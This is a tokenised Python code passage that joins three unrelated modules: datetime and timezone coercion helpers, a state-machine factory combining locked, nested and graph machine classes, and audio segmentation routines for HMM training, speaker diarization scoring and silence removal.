<NUM_LIT:0> ) : <EOL> try : <EOL> return datetime . time ( h , m , s ) <EOL> except ValueError : <EOL> raise TypeError ( "<STR_LIT>" . format ( time ) ) <EOL> if isinstance ( time , str ) : <EOL> match = re . match ( r"<STR_LIT>" , time ) <EOL> if match is None : <EOL> match = re . match ( r"<STR_LIT>" , time ) <EOL> if match is not None : <EOL> return from_parts ( * [ int ( g ) for g in match . groups ( ) ] ) <EOL> raise TypeError ( "<STR_LIT>" . format ( time ) ) <EOL> _DATETIME_REGEXES = [ <EOL> re . compile ( r ) <EOL> for r in ( <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> ) <EOL> ] <EOL> def ensure_datetime ( dt ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( dt , datetime . datetime ) : <EOL> return dt <EOL> try : <EOL> item = dt . item ( ) <EOL> except : <EOL> pass <EOL> else : <EOL> if isinstance ( item , datetime . datetime ) : <EOL> return item . replace ( tzinfo = UTC ) <EOL> if dt == "<STR_LIT>" : <EOL> return datetime . datetime . utcnow ( ) . replace ( tzinfo = UTC ) <EOL> def from_parts ( ye , mo , da , ho = <NUM_LIT:0> , mi = <NUM_LIT:0> , se = <NUM_LIT:0> ) : <EOL> try : <EOL> return datetime . datetime ( ye , mo , da , ho , mi , se , tzinfo = UTC ) <EOL> except ValueError : <EOL> raise TypeError ( "<STR_LIT>" . format ( dt ) ) <EOL> if isinstance ( dt , str ) : <EOL> for regex in _DATETIME_REGEXES : <EOL> match = regex . match ( dt ) <EOL> if match is not None : <EOL> ye = int ( match . group ( "<STR_LIT>" ) ) <EOL> mo = int ( match . group ( "<STR_LIT>" ) ) <EOL> da = int ( match . group ( "<STR_LIT>" ) ) <EOL> ho = int ( if_none ( match . group ( "<STR_LIT>" ) , <NUM_LIT:0> ) ) <EOL> mi = int ( if_none ( match . group ( "<STR_LIT>" ) , <NUM_LIT:0> ) ) <EOL> se = int ( if_none ( match . group ( "<STR_LIT>" ) , <NUM_LIT:0> ) ) <EOL> return from_parts ( ye , mo , da , ho , mi , se ) <EOL> raise TypeError ( "<STR_LIT>" . format ( dt ) ) <EOL> def ensure_timedelta ( delta ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( delta , datetime . timedelta ) : <EOL> return delta <EOL> if isinstance ( delta , str ) : <EOL> match = re . match ( r"<STR_LIT>" , delta ) <EOL> if match is not None : <EOL> num , unit = match . groups ( ) <EOL> if unit == "<STR_LIT:d>" : <EOL> return datetime . timedelta ( int ( num ) , <NUM_LIT:0> ) <EOL> else : <EOL> secs = int ( num ) * { "<STR_LIT:h>" : <NUM_LIT> , "<STR_LIT:m>" : <NUM_LIT> , "<STR_LIT:s>" : <NUM_LIT:1> } . get ( unit ) <EOL> return datetime . timedelta ( <NUM_LIT:0> , secs ) <EOL> raise TypeError ( "<STR_LIT>" . format ( delta ) ) <EOL> def ensure_tz ( tz ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( tz , datetime . tzinfo ) : <EOL> return tz <EOL> if tz is None : <EOL> return UTC <EOL> if isinstance ( tz , str ) : <EOL> try : <EOL> return pytz . timezone ( tz ) <EOL> except pytz . exceptions . UnknownTimeZoneError : <EOL> raise ValueError ( "<STR_LIT>" . format ( tz ) ) <EOL> raise TypeError ( "<STR_LIT>" . format ( tz ) ) </s>
<s> from . . core import Machine <EOL> from . nesting import HierarchicalMachine , NestedTransition , NestedEvent <EOL> from . locking import LockedMachine , LockedEvent <EOL> from . diagrams import GraphMachine , TransitionGraphSupport <EOL> class MachineFactory ( object ) : <EOL> @ staticmethod <EOL> def get_predefined ( graph = False , nested = False , locked = False ) : <EOL> if graph and nested and locked : <EOL> return LockedHierarchicalGraphMachine <EOL> elif locked and nested : <EOL> return LockedHierarchicalMachine <EOL> elif locked and graph : <EOL> return LockedGraphMachine <EOL> elif nested and graph : <EOL> return HierarchicalGraphMachine <EOL> elif graph : <EOL> return GraphMachine <EOL> elif nested : <EOL> return HierarchicalMachine <EOL> elif locked : <EOL> return LockedMachine <EOL> else : <EOL> return Machine <EOL> class NestedGraphTransition ( TransitionGraphSupport , NestedTransition ) : <EOL> pass <EOL> class LockedNestedEvent ( LockedEvent , NestedEvent ) : <EOL> pass <EOL> class HierarchicalGraphMachine ( GraphMachine , HierarchicalMachine ) : <EOL> @ staticmethod <EOL> def _create_transition ( * args , ** kwargs ) : <EOL> return NestedGraphTransition ( * args , ** kwargs ) <EOL> class LockedHierarchicalMachine ( LockedMachine , HierarchicalMachine ) : <EOL> @ staticmethod <EOL> def _create_event ( * args , ** kwargs ) : <EOL> return LockedNestedEvent ( * args , ** kwargs ) <EOL> class LockedGraphMachine ( GraphMachine , LockedMachine ) : <EOL> pass <EOL> class LockedHierarchicalGraphMachine ( GraphMachine , LockedMachine , HierarchicalMachine ) : <EOL> @ staticmethod <EOL> def _create_transition ( * args , ** kwargs ) : <EOL> return NestedGraphTransition ( * args , ** kwargs ) <EOL> @ staticmethod <EOL> def _create_event ( * args , ** kwargs ) : <EOL> return LockedNestedEvent ( * args , ** kwargs ) </s>
<s> import numpy <EOL> import mlpy <EOL> import time <EOL> import scipy <EOL> import os <EOL> import audioFeatureExtraction as aF <EOL> import audioTrainTest as aT <EOL> import audioBasicIO <EOL> import matplotlib . pyplot as plt <EOL> from scipy . spatial import distance <EOL> import matplotlib . pyplot as plt <EOL> import matplotlib . cm as cm <EOL> from sklearn . lda import LDA <EOL> import csv <EOL> import os . path <EOL> import sklearn <EOL> import sklearn . hmm <EOL> import cPickle <EOL> import glob <EOL> """<STR_LIT>""" <EOL> def smoothMovingAvg ( inputSignal , windowLen = <NUM_LIT:11> ) : <EOL> windowLen = int ( windowLen ) <EOL> if inputSignal . ndim != <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if inputSignal . size < windowLen : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if windowLen < <NUM_LIT:3> : <EOL> return inputSignal <EOL> s = numpy . r_ [ <NUM_LIT:2> * inputSignal [ <NUM_LIT:0> ] - inputSignal [ windowLen - <NUM_LIT:1> : : - <NUM_LIT:1> ] , inputSignal , <NUM_LIT:2> * inputSignal [ - <NUM_LIT:1> ] - inputSignal [ - <NUM_LIT:1> : - windowLen : - <NUM_LIT:1> ] ] <EOL> w = numpy . ones ( windowLen , '<STR_LIT:d>' ) <EOL> y = numpy . convolve ( w / w . sum ( ) , s , mode = '<STR_LIT>' ) <EOL> return y [ windowLen : - windowLen + <NUM_LIT:1> ] <EOL> def selfSimilarityMatrix ( featureVectors ) : <EOL> '''<STR_LIT>''' <EOL> [ nDims , nVectors ] = featureVectors . shape <EOL> [ featureVectors2 , MEAN , STD ] = aT . normalizeFeatures ( [ featureVectors . T ] ) <EOL> featureVectors2 = featureVectors2 [ <NUM_LIT:0> ] . T <EOL> S = <NUM_LIT:1.0> - distance . squareform ( distance . pdist ( featureVectors2 . T , '<STR_LIT>' ) ) <EOL> return S <EOL> def flags2segs ( Flags , window ) : <EOL> '''<STR_LIT>''' <EOL> preFlag = <NUM_LIT:0> <EOL> curFlag = <NUM_LIT:0> <EOL> numOfSegments = <NUM_LIT:0> <EOL> curVal = Flags [ curFlag ] <EOL> segsList = [ ] <EOL> classes = [ ] <EOL> while ( curFlag < len ( Flags ) - <NUM_LIT:1> ) : <EOL> stop = <NUM_LIT:0> <EOL> preFlag = curFlag <EOL> preVal = curVal <EOL> while ( stop == <NUM_LIT:0> ) : <EOL> curFlag = curFlag + <NUM_LIT:1> <EOL> tempVal = Flags [ curFlag ] <EOL> if ( ( tempVal != curVal ) | ( curFlag == len ( Flags ) - <NUM_LIT:1> ) ) : <EOL> numOfSegments = numOfSegments + <NUM_LIT:1> <EOL> stop = <NUM_LIT:1> <EOL> curSegment = curVal <EOL> curVal = Flags [ curFlag ] <EOL> segsList . append ( ( curFlag * window ) ) <EOL> classes . append ( preVal ) <EOL> segs = numpy . zeros ( ( len ( segsList ) , <NUM_LIT:2> ) ) <EOL> for i in range ( len ( segsList ) ) : <EOL> if i > <NUM_LIT:0> : <EOL> segs [ i , <NUM_LIT:0> ] = segsList [ i - <NUM_LIT:1> ] <EOL> segs [ i , <NUM_LIT:1> ] = segsList [ i ] <EOL> return ( segs , classes ) <EOL> def segs2flags ( segStart , segEnd , segLabel , winSize ) : <EOL> '''<STR_LIT>''' <EOL> flags = [ ] <EOL> classNames = list ( set ( segLabel ) ) <EOL> curPos = winSize / <NUM_LIT> <EOL> while curPos < segEnd [ - <NUM_LIT:1> ] : <EOL> for i in range ( len ( segStart ) ) : <EOL> if curPos > segStart [ i ] and curPos <= segEnd [ i ] : <EOL> break <EOL> flags . append ( classNames . index ( segLabel [ i ] ) ) <EOL> curPos += winSize <EOL> return numpy . array ( flags ) , classNames <EOL> def readSegmentGT ( gtFile ) : <EOL> '''<STR_LIT>''' <EOL> f = open ( gtFile , "<STR_LIT:rb>" ) <EOL> reader = csv . reader ( f , delimiter = '<STR_LIT:U+002C>' ) <EOL> segStart = [ ] <EOL> segEnd = [ ] <EOL> segLabel = [ ] <EOL> for row in reader : <EOL> if len ( row ) == <NUM_LIT:3> : <EOL> segStart . append ( float ( row [ <NUM_LIT:0> ] ) ) <EOL> segEnd . append ( float ( row [ <NUM_LIT:1> ] ) ) <EOL> segLabel . append ( ( row [ <NUM_LIT:2> ] ) ) <EOL> return numpy . array ( segStart ) , numpy . array ( segEnd ) , segLabel <EOL> def plotSegmentationResults ( flagsInd , flagsIndGT , classNames , mtStep , ONLY_EVALUATE = False ) : <EOL> '''<STR_LIT>''' <EOL> flags = [ classNames [ int ( f ) ] for f in flagsInd ] <EOL> ( segs , classes ) = flags2segs ( flags , mtStep ) <EOL> minLength = min ( flagsInd . shape [ <NUM_LIT:0> ] , flagsIndGT . shape [ <NUM_LIT:0> ] ) <EOL> if minLength > <NUM_LIT:0> : <EOL> accuracy = numpy . count_nonzero ( flagsInd [ <NUM_LIT:0> : minLength ] == flagsIndGT [ <NUM_LIT:0> : minLength ] ) / float ( minLength ) <EOL> else : <EOL> accuracy = - <NUM_LIT:1> <EOL> if not ONLY_EVALUATE : <EOL> Duration = segs [ - <NUM_LIT:1> , <NUM_LIT:1> ] <EOL> SPercentages = numpy . zeros ( ( len ( classNames ) , <NUM_LIT:1> ) ) <EOL> Percentages = numpy . zeros ( ( len ( classNames ) , <NUM_LIT:1> ) ) <EOL> AvDurations = numpy . zeros ( ( len ( classNames ) , <NUM_LIT:1> ) ) <EOL> for iSeg in range ( segs . shape [ <NUM_LIT:0> ] ) : <EOL> SPercentages [ classNames . index ( classes [ iSeg ] ) ] += ( segs [ iSeg , <NUM_LIT:1> ] - segs [ iSeg , <NUM_LIT:0> ] ) <EOL> for i in range ( SPercentages . shape [ <NUM_LIT:0> ] ) : <EOL> Percentages [ i ] = <NUM_LIT> * SPercentages [ i ] / Duration <EOL> S = sum ( <NUM_LIT:1> for c in classes if c == classNames [ i ] ) <EOL> if S > <NUM_LIT:0> : <EOL> AvDurations [ i ] = SPercentages [ i ] / S <EOL> else : <EOL> AvDurations [ i ] = <NUM_LIT:0.0> <EOL> for i in range ( Percentages . shape [ <NUM_LIT:0> ] ) : <EOL> print classNames [ i ] , Percentages [ i ] , AvDurations [ i ] <EOL> font = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:size>' : <NUM_LIT:10> } <EOL> plt . rc ( '<STR_LIT>' , ** font ) <EOL> fig = plt . figure ( ) <EOL> ax1 = fig . add_subplot ( <NUM_LIT> ) <EOL> ax1 . set_yticks ( numpy . array ( range ( len ( classNames ) ) ) ) <EOL> ax1 . axis ( ( <NUM_LIT:0> , Duration , - <NUM_LIT:1> , len ( classNames ) ) ) <EOL> ax1 . set_yticklabels ( classNames ) <EOL> ax1 . plot ( numpy . array ( range ( len ( flagsInd ) ) ) * mtStep + mtStep / <NUM_LIT> , flagsInd ) <EOL> if flagsIndGT . shape [ <NUM_LIT:0> ] > <NUM_LIT:0> : <EOL> ax1 . plot ( numpy . array ( range ( len ( flagsIndGT ) ) ) * mtStep + mtStep / <NUM_LIT> , flagsIndGT + <NUM_LIT> , '<STR_LIT>' ) <EOL> plt . xlabel ( "<STR_LIT>" ) <EOL> if accuracy >= <NUM_LIT:0> : <EOL> plt . title ( '<STR_LIT>' . format ( <NUM_LIT> * accuracy ) ) <EOL> ax2 = fig . add_subplot ( <NUM_LIT> ) <EOL> plt . title ( "<STR_LIT>" ) <EOL> ax2 . axis ( ( <NUM_LIT:0> , len ( classNames ) + <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:100> ) ) <EOL> ax2 . set_xticks ( numpy . array ( range ( len ( classNames ) + <NUM_LIT:1> ) ) ) <EOL> ax2 . set_xticklabels ( [ "<STR_LIT:U+0020>" ] + classNames ) <EOL> ax2 . bar ( numpy . array ( range ( len ( classNames ) ) ) + <NUM_LIT:0.5> , Percentages ) <EOL> ax3 = fig . add_subplot ( <NUM_LIT> ) <EOL> plt . title ( "<STR_LIT>" ) <EOL> ax3 . axis ( ( <NUM_LIT:0> , len ( classNames ) + <NUM_LIT:1> , <NUM_LIT:0> , AvDurations . max ( ) ) ) <EOL> ax3 . set_xticks ( numpy . array ( range ( len ( classNames ) + <NUM_LIT:1> ) ) ) <EOL> ax3 . set_xticklabels ( [ "<STR_LIT:U+0020>" ] + classNames ) <EOL> ax3 . bar ( numpy . array ( range ( len ( classNames ) ) ) + <NUM_LIT:0.5> , AvDurations ) <EOL> fig . tight_layout ( ) <EOL> plt . show ( ) <EOL> return accuracy <EOL> def evaluateSpeakerDiarization ( flags , flagsGT ) : <EOL> minLength = min ( flags . shape [ <NUM_LIT:0> ] , flagsGT . shape [ <NUM_LIT:0> ] ) <EOL> flags = flags [ <NUM_LIT:0> : minLength ] <EOL> flagsGT = flagsGT [ <NUM_LIT:0> : minLength ] <EOL> uFlags = numpy . unique ( flags ) <EOL> uFlagsGT = numpy . unique ( flagsGT ) <EOL> cMatrix = numpy . zeros ( ( uFlags . shape [ <NUM_LIT:0> ] , uFlagsGT . shape [ <NUM_LIT:0> ] ) ) <EOL> for i in range ( minLength ) : <EOL> cMatrix [ int ( numpy . nonzero ( uFlags == flags [ i ] ) [ <NUM_LIT:0> ] ) , int ( numpy . nonzero ( uFlagsGT == flagsGT [ i ] ) [ <NUM_LIT:0> ] ) ] += <NUM_LIT:1.0> <EOL> Nc , Ns = cMatrix . shape <EOL> N_s = numpy . sum ( cMatrix , axis = <NUM_LIT:0> ) <EOL> N_c = numpy . sum ( cMatrix , axis = <NUM_LIT:1> ) <EOL> N = numpy . sum ( cMatrix ) <EOL> purityCluster = numpy . zeros ( ( Nc , ) ) <EOL> puritySpeaker = numpy . zeros ( ( Ns , ) ) <EOL> for i in range ( Nc ) : <EOL> purityCluster [ i ] = numpy . max ( ( cMatrix [ i , : ] ) ) / ( N_c [ i ] ) <EOL> for j in range ( Ns ) : <EOL> puritySpeaker [ j ] = numpy . max ( ( cMatrix [ : , j ] ) ) / ( N_s [ j ] ) <EOL> purityClusterMean = numpy . sum ( purityCluster * N_c ) / N <EOL> puritySpeakerMean = numpy . sum ( puritySpeaker * N_s ) / N <EOL> return purityClusterMean , puritySpeakerMean <EOL> def trainHMM_computeStatistics ( features , labels ) : <EOL> '''<STR_LIT>''' <EOL> uLabels = numpy . unique ( labels ) <EOL> nComps = len ( uLabels ) <EOL> nFeatures = features . shape [ <NUM_LIT:0> ] <EOL> if features . shape [ <NUM_LIT:1> ] < labels . shape [ <NUM_LIT:0> ] : <EOL> print "<STR_LIT>" <EOL> labels = labels [ <NUM_LIT:0> : features . shape [ <NUM_LIT:1> ] ] <EOL> startprob = numpy . zeros ( ( nComps , ) ) <EOL> for i , u in enumerate ( uLabels ) : <EOL> startprob [ i ] = numpy . count_nonzero ( labels == u ) <EOL> startprob = startprob / startprob . sum ( ) <EOL> transmat = numpy . zeros ( ( nComps , nComps ) ) <EOL> for i in range ( labels . shape [ <NUM_LIT:0> ] - <NUM_LIT:1> ) : <EOL> transmat [ int ( labels [ i ] ) , int ( labels [ i + <NUM_LIT:1> ] ) ] += <NUM_LIT:1> <EOL> for i in range ( nComps ) : <EOL> transmat [ i , : ] /= transmat [ i , : ] . sum ( ) <EOL> means = numpy . zeros ( ( nComps , nFeatures ) ) <EOL> for i in range ( nComps ) : <EOL> means [ i , : ] = numpy . matrix ( features [ : , numpy . nonzero ( labels == uLabels [ i ] ) [ <NUM_LIT:0> ] ] . mean ( axis = <NUM_LIT:1> ) ) <EOL> cov = numpy . zeros ( ( nComps , nFeatures ) ) <EOL> for i in range ( nComps ) : <EOL> cov [ i , : ] = numpy . std ( features [ : , numpy . nonzero ( labels == uLabels [ i ] ) [ <NUM_LIT:0> ] ] , axis = <NUM_LIT:1> ) <EOL> return startprob , transmat , means , cov <EOL> def trainHMM_fromFile ( wavFile , gtFile , hmmModelName , mtWin , mtStep ) : <EOL> '''<STR_LIT>''' <EOL> [ segStart , segEnd , segLabels ] = readSegmentGT ( gtFile ) <EOL> flags , classNames = segs2flags ( segStart , segEnd , segLabels , mtStep ) <EOL> [ Fs , x ] = audioBasicIO . readAudioFile ( wavFile ) <EOL> [ F , _ ] = aF . mtFeatureExtraction ( x , Fs , mtWin * Fs , mtStep * Fs , round ( Fs * <NUM_LIT> ) , round ( Fs * <NUM_LIT> ) ) <EOL> startprob , transmat , means , cov = trainHMM_computeStatistics ( F , flags ) <EOL> hmm = sklearn . hmm . GaussianHMM ( startprob . shape [ <NUM_LIT:0> ] , "<STR_LIT>" , startprob , transmat ) <EOL> hmm . means_ = means <EOL> hmm . covars_ = cov <EOL> fo = open ( hmmModelName , "<STR_LIT:wb>" ) <EOL> cPickle . dump ( hmm , fo , protocol = cPickle . HIGHEST_PROTOCOL ) <EOL> cPickle . dump ( classNames , fo , protocol = cPickle . HIGHEST_PROTOCOL ) <EOL> cPickle . dump ( mtWin , fo , protocol = cPickle . HIGHEST_PROTOCOL ) <EOL> cPickle . dump ( mtStep , fo , protocol = cPickle . HIGHEST_PROTOCOL ) <EOL> fo . close ( ) <EOL> return hmm , classNames <EOL> def trainHMM_fromDir ( dirPath , hmmModelName , mtWin , mtStep ) : <EOL> '''<STR_LIT>''' <EOL> flagsAll = numpy . array ( [ ] ) <EOL> classesAll = [ ] <EOL> for i , f in enumerate ( glob . glob ( dirPath + os . sep + '<STR_LIT>' ) ) : <EOL> wavFile = f <EOL> gtFile = f . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if not os . path . isfile ( gtFile ) : <EOL> continue <EOL> [ segStart , segEnd , segLabels ] = readSegmentGT ( gtFile ) <EOL> flags , classNames = segs2flags ( segStart , segEnd , segLabels , mtStep ) <EOL> for c in classNames : <EOL> if c not in classesAll : <EOL> classesAll . append ( c ) <EOL> [ Fs , x ] = audioBasicIO . readAudioFile ( wavFile ) <EOL> [ F , _ ] = aF . mtFeatureExtraction ( x , Fs , mtWin * Fs , mtStep * Fs , round ( Fs * <NUM_LIT> ) , round ( Fs * <NUM_LIT> ) ) <EOL> lenF = F . shape [ <NUM_LIT:1> ] <EOL> lenL = len ( flags ) <EOL> MIN = min ( lenF , lenL ) <EOL> F = F [ : , <NUM_LIT:0> : MIN ] <EOL> flags = flags [ <NUM_LIT:0> : MIN ] <EOL> flagsNew = [ ] <EOL> for j , fl in enumerate ( flags ) : <EOL> flagsNew . append ( classesAll . index ( classNames [ flags [ j ] ] ) ) <EOL> flagsAll = numpy . append ( flagsAll , numpy . array ( flagsNew ) ) <EOL> if i == <NUM_LIT:0> : <EOL> Fall = F <EOL> else : <EOL> Fall = numpy . concatenate ( ( Fall , F ) , axis = <NUM_LIT:1> ) <EOL> startprob , transmat , means , cov = trainHMM_computeStatistics ( Fall , flagsAll ) <EOL> hmm = sklearn . hmm . GaussianHMM ( startprob . shape [ <NUM_LIT:0> ] , "<STR_LIT>" , startprob , transmat ) <EOL> hmm . means_ = means <EOL> hmm . covars_ = cov <EOL> fo = open ( hmmModelName , "<STR_LIT:wb>" ) <EOL> cPickle . dump ( hmm , fo , protocol = cPickle . HIGHEST_PROTOCOL ) <EOL> cPickle . dump ( classesAll , fo , protocol = cPickle . HIGHEST_PROTOCOL ) <EOL> cPickle . dump ( mtWin , fo , protocol = cPickle . HIGHEST_PROTOCOL ) <EOL> cPickle . dump ( mtStep , fo , protocol = cPickle . HIGHEST_PROTOCOL ) <EOL> fo . close ( ) <EOL> return hmm , classesAll <EOL> def hmmSegmentation ( wavFileName , hmmModelName , PLOT = False , gtFileName = "<STR_LIT>" ) : <EOL> [ Fs , x ] = audioBasicIO . readAudioFile ( wavFileName ) <EOL> try : <EOL> fo = open ( hmmModelName , "<STR_LIT:rb>" ) <EOL> except IOError : <EOL> print "<STR_LIT>" <EOL> return <EOL> try : <EOL> hmm = cPickle . load ( fo ) <EOL> classesAll = cPickle . load ( fo ) <EOL> mtWin = cPickle . load ( fo ) <EOL> mtStep = cPickle . load ( fo ) <EOL> except : <EOL> fo . close ( ) <EOL> fo . close ( ) <EOL> [ Features , _ ] = aF . mtFeatureExtraction ( x , Fs , mtWin * Fs , mtStep * Fs , round ( Fs * <NUM_LIT> ) , round ( Fs * <NUM_LIT> ) ) <EOL> flagsInd = hmm . predict ( Features . T ) <EOL> if os . path . isfile ( gtFileName ) : <EOL> [ segStart , segEnd , segLabels ] = readSegmentGT ( gtFileName ) <EOL> flagsGT , classNamesGT = segs2flags ( segStart , segEnd , segLabels , mtStep ) <EOL> flagsGTNew = [ ] <EOL> for j , fl in enumerate ( flagsGT ) : <EOL> if classNamesGT [ flagsGT [ j ] ] in classesAll : <EOL> flagsGTNew . append ( classesAll . index ( classNamesGT [ flagsGT [ j ] ] ) ) <EOL> else : <EOL> flagsGTNew . append ( - <NUM_LIT:1> ) <EOL> flagsIndGT = numpy . array ( flagsGTNew ) <EOL> else : <EOL> flagsIndGT = numpy . array ( [ ] ) <EOL> acc = plotSegmentationResults ( flagsInd , flagsIndGT , classesAll , mtStep , not PLOT ) <EOL> if acc >= <NUM_LIT:0> : <EOL> print "<STR_LIT>" . format ( acc ) <EOL> return flagsInd , classesAll , acc <EOL> def mtFileClassification ( inputFile , modelName , modelType , plotResults = False , gtFile = "<STR_LIT>" ) : <EOL> '''<STR_LIT>''' <EOL> if not os . path . isfile ( modelName ) : <EOL> print "<STR_LIT>" <EOL> return ( - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ) <EOL> if modelType == '<STR_LIT>' : <EOL> [ Classifier , MEAN , STD , classNames , mtWin , mtStep , stWin , stStep , computeBEAT ] = aT . loadSVModel ( modelName ) <EOL> elif modelType == '<STR_LIT>' : <EOL> [ Classifier , MEAN , STD , classNames , mtWin , mtStep , stWin , stStep , computeBEAT ] = aT . loadKNNModel ( modelName ) <EOL> if computeBEAT : <EOL> print "<STR_LIT>" + modelName + "<STR_LIT>" <EOL> return ( - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ) <EOL> [ Fs , x ] = audioBasicIO . readAudioFile ( inputFile ) <EOL> if Fs == - <NUM_LIT:1> : <EOL> return ( - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ) <EOL> x = audioBasicIO . stereo2mono ( x ) <EOL> Duration = len ( x ) / Fs <EOL> [ MidTermFeatures , _ ] = aF . mtFeatureExtraction ( x , Fs , mtWin * Fs , mtStep * Fs , round ( Fs * stWin ) , round ( Fs * stStep ) ) <EOL> flags = [ ] <EOL> Ps = [ ] <EOL> flagsInd = [ ] <EOL> for i in range ( MidTermFeatures . shape [ <NUM_LIT:1> ] ) : <EOL> curFV = ( MidTermFeatures [ : , i ] - MEAN ) / STD <EOL> [ Result , P ] = aT . classifierWrapper ( Classifier , modelType , curFV ) <EOL> flagsInd . append ( Result ) <EOL> flags . append ( classNames [ int ( Result ) ] ) <EOL> Ps . append ( numpy . max ( P ) ) <EOL> flagsInd = numpy . array ( flagsInd ) <EOL> for i in range ( <NUM_LIT:1> , len ( flagsInd ) - <NUM_LIT:1> ) : <EOL> if flagsInd [ i - <NUM_LIT:1> ] == flagsInd [ i + <NUM_LIT:1> ] : <EOL> flagsInd [ i ] = flagsInd [ i + <NUM_LIT:1> ] <EOL> ( segs , classes ) = flags2segs ( flags , mtStep ) <EOL> segs [ - <NUM_LIT:1> ] = len ( x ) / float ( Fs ) <EOL> if os . path . isfile ( gtFile ) : <EOL> [ segStartGT , segEndGT , segLabelsGT ] = readSegmentGT ( gtFile ) <EOL> flagsGT , classNamesGT = segs2flags ( segStartGT , segEndGT , segLabelsGT , mtStep ) <EOL> flagsIndGT = [ ] <EOL> for j , fl in enumerate ( flagsGT ) : <EOL> if classNamesGT [ flagsGT [ j ] ] in classNames : <EOL> flagsIndGT . append ( classNames . index ( classNamesGT [ flagsGT [ j ] ] ) ) <EOL> else : <EOL> flagsIndGT . append ( - <NUM_LIT:1> ) <EOL> flagsIndGT = numpy . array ( flagsIndGT ) <EOL> else : <EOL> flagsIndGT = numpy . array ( [ ] ) <EOL> acc = plotSegmentationResults ( flagsInd , flagsIndGT , classNames , mtStep , not plotResults ) <EOL> if acc >= <NUM_LIT:0> : <EOL> print "<STR_LIT>" . format ( acc ) <EOL> return ( flagsInd , classNames , acc ) <EOL> def evaluateSegmentationClassificationDir ( dirName , modelName , methodName ) : <EOL> flagsAll = numpy . array ( [ ] ) <EOL> classesAll = [ ] <EOL> accuracys = [ ] <EOL> for i , f in enumerate ( glob . glob ( dirName + os . sep + '<STR_LIT>' ) ) : <EOL> wavFile = f <EOL> print wavFile <EOL> gtFile = f . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if methodName . lower ( ) in [ "<STR_LIT>" , "<STR_LIT>" ] : <EOL> flagsInd , classNames , acc = mtFileClassification ( wavFile , modelName , methodName , False , gtFile ) <EOL> else : <EOL> flagsInd , classNames , acc = hmmSegmentation ( wavFile , modelName , False , gtFile ) <EOL> if acc > - <NUM_LIT:1> : <EOL> accuracys . append ( acc ) <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" . format ( <NUM_LIT> * numpy . array ( accuracys ) . mean ( ) ) <EOL> print "<STR_LIT>" . format ( <NUM_LIT> * numpy . median ( numpy . array ( accuracys ) ) ) <EOL> print "<STR_LIT>" . format ( <NUM_LIT> * numpy . array ( accuracys ) . min ( ) ) <EOL> print "<STR_LIT>" . format ( <NUM_LIT> * numpy . array ( accuracys ) . max ( ) ) <EOL> def silenceRemoval ( x , Fs , stWin , stStep , smoothWindow = <NUM_LIT:0.5> , Weight = <NUM_LIT:0.5> , plot = False ) : <EOL> '''<STR_LIT>''' <EOL> if Weight >= <NUM_LIT:1> : <EOL> Weight = <NUM_LIT> <EOL> if Weight <= <NUM_LIT:0> : <EOL> Weight = <NUM_LIT> <EOL> x = audioBasicIO . stereo2mono ( x ) <EOL> ShortTermFeatures = aF . stFeatureExtraction ( x , Fs , stWin * Fs , stStep * Fs ) <EOL> EnergySt = ShortTermFeatures [ <NUM_LIT:1> , : ] <EOL> E = numpy . sort ( EnergySt ) <EOL> L1 = int ( len ( E ) / <NUM_LIT:10> ) <EOL> T1 = numpy . mean ( E [ <NUM_LIT:0> : L1 ] ) <EOL> T2 = numpy . mean ( E [ - L1 : - <NUM_LIT:1> ] ) <EOL> Class1 = ShortTermFeatures [ : , numpy . where ( EnergySt < T1 ) [ <NUM_LIT:0> ] ] <EOL> Class2 = ShortTermFeatures [ : , numpy . where ( EnergySt > T2 ) [ <NUM_LIT:0> ] ] <EOL> featuresSS = [ Class1 . T , Class2 . T ] <EOL> [ featuresNormSS , MEANSS , STDSS ] = aT . normalizeFeatures ( featuresSS ) <EOL> SVM = aT . trainSVM ( featuresNormSS , <NUM_LIT:1.0> ) <EOL> ProbOnset = [ ] <EOL> for i in range ( ShortTermFeatures . shape [ <NUM_LIT:1> ] ) : <EOL> curFV = ( ShortTermFeatures [ : , i ] - MEANSS ) / STDSS <EOL> ProbOnset . append ( SVM . pred_probability ( curFV ) [ <NUM_LIT:1> ] ) <EOL> ProbOnset = numpy . array ( ProbOnset ) <EOL> ProbOnset = smoothMovingAvg ( ProbOnset , smoothWindow / stStep ) <EOL> ProbOnsetSorted = numpy . sort ( ProbOnset ) <EOL> Nt = ProbOnsetSorted . shape [ <NUM_LIT:0> ] / <NUM_LIT:10> <EOL> T = ( numpy . mean ( ( <NUM_LIT:1> - Weight ) * ProbOnsetSorted [ <NUM_LIT:0> : Nt ] ) + Weight * numpy . mean ( ProbOnsetSorted [ - Nt : : ] ) ) <EOL> MaxIdx = numpy . where ( ProbOnset > T ) [ <NUM_LIT:0> ] <EOL> i = <NUM_LIT:0> <EOL> timeClusters = [ ] <EOL> segmentLimits = [ ] <EOL> while i < len ( MaxIdx ) : <EOL> curCluster = [ MaxIdx [ i ] ] <EOL> if i == len ( MaxIdx ) - <NUM_LIT:1> : <EOL> break <EOL> while MaxIdx [ i + <NUM_LIT:1> ] - curCluster [ - <NUM_LIT:1> ] <= <NUM_LIT:2> : <EOL> curCluster . append ( MaxIdx [ i + <NUM_LIT:1> ] ) <EOL> i += <NUM_LIT:1> <EOL> if i == len ( MaxIdx ) - <NUM_LIT:1> : <EOL> break <EOL> i += <NUM_LIT:1> <EOL> timeClusters . append ( curCluster ) <EOL> segmentLimits . append ( [ curCluster [ <NUM_LIT:0> ] * stStep , curCluster [ - <NUM_LIT:1> ] * stStep ] ) <EOL> minDuration = <NUM_LIT> <EOL> segmentLimits2 = [ ] <EOL> for s in segmentLimits : <EOL> if s [ <NUM_LIT:1> ] - s [ <NUM_LIT:0> ] > minDuration : <EOL> segmentLimits2 . append ( s ) <EOL> segmentLimits = segmentLimits2 <EOL> if plot : 